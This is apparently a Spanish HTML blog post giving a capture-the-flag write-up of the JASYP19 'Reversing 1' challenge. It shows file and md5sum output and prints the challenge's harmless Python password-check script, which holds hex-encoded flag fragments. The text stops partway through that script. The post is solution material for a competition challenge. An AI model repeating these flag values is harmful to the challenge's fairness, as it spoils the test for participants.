<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri, sans-serif; font-size: 11pt; font-variant: normal; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><span style="text-align: start;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri, sans-serif; font-size: 11pt; font-variant: normal; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><span style="text-align: start;">Autor: @1r0Dm448O</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri, sans-serif; font-size: 11pt; font-variant: normal; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri, sans-serif; font-size: 11pt; font-variant: normal; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Compartimos en este post la resolución de un reto de JASYP19 realizada por nuestro compañero IVAN, en el que se busca obtener una contraseña (flag) realizando un reversing de un archivo dado.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri, sans-serif; font-size: 11pt; font-variant: normal; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><span style="text-align: start;"></span></span></div>
<a name='more'></a><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Descripción</span></div>
<b id="docs-internal-guid-81114658-7fff-f7f3-fb6e-8a8e52a350d4" style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Nombre:</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> Reversing 1 (</span><a href="https://ctf.interferencias.tech/challenges#Reversing%201" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://ctf.interferencias.tech/challenges#Reversing%201</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> )</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Fecha de liberación:</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> 26 de abril de 2019</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Autor: </span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Inter_ferencias (</span><a href="https://twitter.com/inter_ferencias" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://twitter.com/inter_ferencias</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> ) y #HackingDesdeCero (</span><a href="https://twitter.com/hashtag/hackingdesdecero" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://twitter.com/hashtag/hackingdesdecero</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">) </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Dificultad:</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> Bajo-Medio</span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Objetivo</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Formato de flag: JASYP{flag}</span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 308px; overflow: hidden; width: 400px;"><img height="308" src="https://lh3.googleusercontent.com/OugPqdz_KmpFF1dQCAdFAphvJGns4KShz0mK3s5cicW_Y3pNjGFLcP7oftTV13ii-qSuMCMvKSI3qT-lR_EV7iZ9oXzGd5LDE04R4Xsx8tmSRuod6X1br6hPp-WChj14gVZkREWk" style="margin-left: 0px; margin-top: 0px;" width="400" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Herramientas utilizadas</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Firefox Version 60.7.0 </span><a href="https://www.mozilla.org/en-US/firefox/60.7.0/releasenotes/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://www.mozilla.org/en-US/firefox/60.7.0/releasenotes/</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Python </span><a href="https://www.python.org/downloads/release/python-2716/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://www.python.org/downloads/release/python-2716/</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Resumen:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Descargamos a través del link en la parte inferior izquierda de la pantalla el archivo llamado </span><a href="https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/JASYPCTF19/reversing/reversing1/reverse_me.py" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">reverse_me.py</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> (4226de9b85ad25cf7957d7cd06c92eb9)</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> y pasamos a realizar un análisis preliminar:</span></div>
<b style="font-weight: normal;"><br /></b>
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/JASYPCTF2019/reversing/reversing1</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># file reverse_me.py </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">reverse_me.py: Python script, ASCII text executable</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/JASYPCTF2019/reversing/reversing1</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># md5sum reverse_me.py </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">4226de9b85ad25cf7957d7cd06c92eb9 reverse_me.py</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Examinamos el script de Python</span></div>
<b style="font-weight: normal;"><br /></b>
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">#!/usr/bin/env python</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">import sys</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">import base64</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print3 = str(sys.argv[1])</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print5 = </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"3033324534443730453344304237367d"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print1 = </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"4a415359507b43453646333639463543304635364333"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print2 = </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"Password incorrecta"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print10 = </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"qwerty"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">def a():</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">d = 3</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">if</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> len(print3)%d==2:</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">return</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> base64.b64decode(print3[::-1])</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">def b():</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">d = 3</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">e = 5</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">if</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> len(print3)%d!=0:</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">return</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> (len(print3)%e)*12</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print1 = print1+str(b())</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 